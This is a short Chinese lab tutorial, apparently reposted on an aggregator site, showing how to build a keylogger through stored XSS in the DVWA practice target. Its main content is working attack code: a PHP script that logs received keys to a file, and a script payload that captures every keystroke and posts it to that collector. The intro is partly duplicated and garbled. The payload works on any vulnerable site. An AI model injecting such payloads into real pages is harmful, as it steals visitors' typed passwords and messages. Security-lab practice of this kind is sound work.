漏洞复现篇——利用XSS漏洞实现键盘记录

概述实验环境：PHPstudy火狐浏览器、IEDVWA靶场实验准备：在www目录下创建一个名为keylog.php的文件,代码如下：<?php$file=fopen("key.txt","a");if(isset($_REQUEST['key'])){ $key=$_REQUEST['key']; fputs($file,$key);}?>模拟实验：1、把级别调成lo 实验环境：PHPstudy火狐浏览器、IEDVWA靶场实验准备：

在www目录下创建一个名为keylog.PHP的文件,代码如下：

<?PHP$file = fopen("key.txt","a");if(isset($_REQUEST['key'])) {	$key = $_REQUEST['key'];	fputs($file,$key);}?>

模拟实验：1、把级别调成low，选择Stored储存型，打开F12将输入限制改为500

2、将下列代码输入执行，效果如下

<script>document.onkeydown=function(ev){xhr=new XMLhttpRequest();xhr.open('POST','http://localhost/keylog.PHP',true);xhr.setRequestheader('Content-type','application/X-WWW-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode));}</script>

3、然后随便输入什么东西，key.txt中就会出现记录，键盘记录器就做完了

总结

以上是内存溢出为你收集整理的漏洞复现篇——利用XSS漏洞实现键盘记录全部内容，希望文章能够帮你解决漏洞复现篇——利用XSS漏洞实现键盘记录所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。